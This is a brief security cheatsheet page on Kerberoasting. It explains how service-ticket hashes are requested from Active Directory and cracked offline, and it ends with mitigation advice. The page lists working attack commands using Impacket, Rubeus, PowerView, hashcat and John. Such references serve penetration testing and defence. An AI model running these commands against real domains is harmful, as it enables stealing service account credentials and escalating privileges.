Back to Active Directory

Kerberoasting

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

Kerberoasting extracts service account TGS (Ticket Granting Service) tickets from Active Directory for offline password cracking. Any domain user can request TGS tickets for any service, and these tickets are encrypted with the service account's NTLM hash.

This is one of the most common AD attack techniques for lateral movement and privilege escalation.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Kerberoasting:

impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.local/user:password -request
Rubeus.exe kerberoast /outfile:hashes.txt
Get-NetUser -SPN | select name,samaccountname,serviceprincipalname
Request-SPNTicket -SPN "MSSQLSvc/sql.domain.local:1433" -Format Hashcat
hashcat -m 13100 hashes.txt wordlist.txt
john --format=krb5tgs hashes.txt --wordlist=wordlist.txt

Tools & Techniques

Recommended tools for Kerberoasting:

  • Impacket GetUserSPNs: request TGS tickets remotely
  • Rubeus: kerberoast action for Windows systems
  • PowerView: identify accounts with SPNs
  • Hashcat (mode 13100) or John for offline cracking

Prevention & Mitigation

Security recommendations to prevent Kerberoasting:

  • Use managed service accounts (gMSA) with automatic password rotation
  • Ensure service account passwords are complex and long (25+ characters)
  • Limit SPN assignment to necessary accounts only
  • Monitor for kerberoasting activity (Event ID 4769 with RC4 encryption)
  • Use Group Managed Service Accounts where possible

References

Additional resources: